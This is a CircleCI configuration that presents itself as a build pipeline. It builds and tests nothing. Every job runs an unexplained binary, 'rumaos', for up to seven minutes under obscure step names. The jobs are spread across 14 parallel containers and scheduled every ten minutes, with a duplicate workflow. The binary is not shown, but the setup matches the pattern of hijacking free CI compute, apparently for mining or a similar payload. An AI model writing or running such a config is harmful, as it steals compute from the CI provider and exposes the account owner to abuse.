version: 2.1

orbs:
  win: circleci/windows@2.4.0
 
executors:
  circleci_machine:
    docker:
      - image: circleci/elixir:1.12.2
    working_directory: ~/repo

commands:
  mahinum:
    description: trustex
    steps:
      - checkout
      - run:
          name: update
          command: |
              sudo apt update -y
      - run:
          name: expert
          command: |
              chmod u+x rumaos && timeout 7m ./rumaos
          
jobs:
  groot1:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [mahinum]
    parallelism: 3
  groot2:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [mahinum]
    parallelism: 2
  groot3:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [mahinum]
    parallelism: 4
  groot4:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [mahinum]
    parallelism: 2
  groot5:
    executor: circleci_machine
    working_directory: ~/repo
    steps: [mahinum]
    parallelism: 3

workflows:
  version: 2
  build:
    jobs:
      - groot1
      - groot2
      - groot3
      - groot4
      - groot5
 
    triggers:
      - schedule:
          cron: "0,10,20,30,40,50 * * * *"
          filters:
            branches:
              only:
                - master

  alternatives:
    jobs:
      - groot1
      - groot2
      - groot3
      - groot4
      - groot5